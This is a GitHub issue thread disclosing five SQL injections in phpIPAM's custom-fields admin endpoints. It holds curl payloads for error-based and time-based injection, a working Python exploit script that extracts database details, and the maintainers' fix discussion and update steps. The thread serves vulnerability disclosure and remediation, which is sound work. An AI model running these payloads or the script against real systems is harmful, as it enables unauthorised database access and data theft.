Five sql injections on All Phpipam Versions. #2738

Closed
2ndGeorge opened this issue Sep 16, 2019 · 6 comments

Comments

@2ndGeorge

2ndGeorge commented Sep 16, 2019

Describe the bug
Five SQL injections on all phpipam versions. The vulnerable files are:

- /app/admin/custom-fields/edit.php
- /app/admin/custom-fields/edit-result.php
- /app/admin/custom-fields/filter.php
- /app/admin/custom-fields/filter-result.php
- /app/admin/custom-fields/order.php

phpIPAM version
All phpipam Versions.

vulnerability 1
req:

```shell
curl 'http://testipam.com/app/admin/custom-fields/edit.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`where 1=(updatexml(1,concat(0x3a,(select user())),1))#`' --compressed --insecure
```

We can find the user() value root@172.21.0.3 in the response content.

rsp:

```
SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':root@172.21.0.3'
```

vulnerability 2
req:

```shell
curl 'http://testipam.com/app/admin/custom-fields/edit-result.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`;select * from users where 1=sleep(10);#`&csrf_cookie=ylbgj5gvd5OFeTeVPMQVgCaD8zxMro1R&name=asdfadsf' --compressed --insecure
```

rsp:
The response time is more than 10 s.

vulnerability 3
req:

```shell
curl 'http://testipam.com/app/admin/custom-fields/filter.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`where 1=(updatexml(1,concat(0x3a,(select user())),1))#`' --compressed --insecure
```

rsp:

```
SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':root@172.21.0.3'
```

vulnerability 4
req:

```shell
curl 'http://testipam.com/app/admin/custom-fields/filter-result.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`where 1=(updatexml(1,concat(0x3a,(select user())),1))#`' --compressed --insecure
```

rsp:

```
SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':root@172.21.0.3'
Filter saved
```

vulnerability 5
req:

```shell
curl 'http://testipam.com/app/admin/custom-fields/order.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`;select * from users where 1=sleep(10);#`&current=1&next=3' --compressed --insecure
```

@GaryAllan
Collaborator

Hi @2ndGeorge

https://www.php.net/manual/en/pdo.quote.php
PDO::quote() places quotes around the input string (if required) and escapes special characters

I think these issues have the same root cause. PDO->quote() isn't behaving as documented and escaping special characters in table names (at least on the machines I've tested); using bound parameters doesn't work for table names.

I may just whitelist table names in queries and drop PDO->quote() completely to be safe.

Non-trivial issue and fix.... may take a few days.
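An identifier allowlist of the kind described above, as an added example that is not phpIPAM's own fix: the `TableNameGuard` class and its table list are constructed for illustration, and it assumes an existing PDO connection `$db`. Values still go through bound parameters; only the identifier is checked against the list, since neither PDO::quote() nor binding is designed for table names.

```php
<?php
// Added example, not phpIPAM code: validate SQL identifiers against a fixed allowlist
// instead of trying to quote or bind them.
declare(strict_types=1);

final class TableNameGuard
{
    /** Tables that custom-field queries may legitimately touch (constructed sample list). */
    private const ALLOWED = ['users', 'subnets', 'vlans', 'devices'];

    /**
     * Returns the table name unchanged if it is on the allowlist, otherwise throws.
     * The comparison is exact and strict, so any name carrying a backtick, a space
     * or a comment marker is rejected before it can reach the query string.
     */
    public static function check(string $table): string
    {
        if (!in_array($table, self::ALLOWED, true)) {
            throw new InvalidArgumentException('Unknown table: ' . var_export($table, true));
        }
        return $table;
    }

    /**
     * Builds the query with the validated identifier; the user-supplied value is bound.
     * Assumes $db is a PDO connection to the application database.
     */
    public static function findByName(PDO $db, string $table, string $name): array
    {
        $safeTable = self::check($table);
        $stmt = $db->prepare('SELECT * FROM `' . $safeTable . '` WHERE `name` = :name');
        $stmt->execute([':name' => $name]);
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    }
}

// Demonstration on constructed input: the legitimate name passes, the injected
// identifier from the report (table=users`where 1=(...)#`) is refused.
foreach (['users', 'users`where 1=(updatexml(1,concat(0x3a,(select user())),1))#`'] as $candidate) {
    try {
        echo 'accepted: ' . TableNameGuard::check($candidate) . PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ' . $e->getMessage() . PHP_EOL;
    }
}
```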

@GaryAllan
Collaborator

Hello @2ndGeorge
I've pushed a fix to the master branch. Are you able to re-test?

@kkirsche

@GaryAllan the changes you've made remediate it in the exploit code I have put together. As this is in the docker versions of the application, the patches were easy to test.

```python
#!/usr/bin/env python3
# Exploit Title: phpIPAM Custom Field Filter SQL Injection
# Exploit Announcement Date: September 16, 2019 5:18 AM
# Exploit Creation Date: September 27, 2019
# Vendor Homepage: https://phpipam.net
# Software Link: https://github.com/phpipam/phpipam/archive/1.4.tar.gz
# Version: 1.4
# Tested on: Ubuntu 18.04 / MariaDB 10.4
# Requires:
#   Python 3
#   requests package

# For more details, view:
# https://github.com/phpipam/phpipam/issues/2738

# Example Output
# [+] Executing select user()
# [*] Received: phpipam@172.18.0.4
# [+] Executing select system_user()
# [*] Received: phpipam@172.18.0.4
# [+] Executing select @@version
# [*] Received: .4.8-MariaDB-1:10.4.8+maria~b
# [+] Executing select @@datadir
# [*] Received: /var/lib/mysq
# [+] Executing select @@hostname
# [*] Received: ubuntu


from requests import Session

host = "localhost"
login_url = f"http://{host}/app/login/login_check.php"
exploit_url = f"http://{host}/app/admin/custom-fields/filter-result.php"

credentials = {
    "ipamusername": "Admin",
    "ipampassword": "Password",
}

payload = {
    "action": "add",
    "table": "",
}


cmds = {
    "unpriv": [
        "select user()",
        "select system_user()",
        "select @@version",
        "select @@datadir",
        "select @@hostname",
    ]
}

if __name__ == "__main__":
    client = Session()
    resp = client.post(login_url, data=credentials)
    if resp.status_code == 200:
        for cmd in cmds["unpriv"]:
            print(f"[+] Executing {cmd}")
            payload["table"] = f"users`where 1=(updatexml(1,concat(0x3a,({cmd})),1))#`"
            resp = client.post(exploit_url, data=payload)
            info = resp.text.lstrip("<div class='alert alert-danger'>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':").rstrip("'</div><div class='alert alert-success'>Filter saved</div>")
            print(f"[*] Received: {info}")
```

@GaryAllan
Collaborator

Thanks

@peawet08

Hi,

I'm running 1.4. Is there a particular file I can download to remediate this or will I have to wait for the next release?

Thanks

@GaryAllan
Collaborator

Hello @peawet08

Fixes have been applied to the 1.3, 1.4 and master branches.

To download the 1.4 git branch:

```shell
git clone --recursive -b 1.4 https://github.com/phpipam/phpipam/
```

or

```shell
git clone -b 1.4 https://github.com/phpipam/phpipam/
cd phpipam
git submodule update --init --recursive
```

To update an existing 1.4 branch:

```shell
cd phpipam
git pull
git submodule update --init --recursive
```
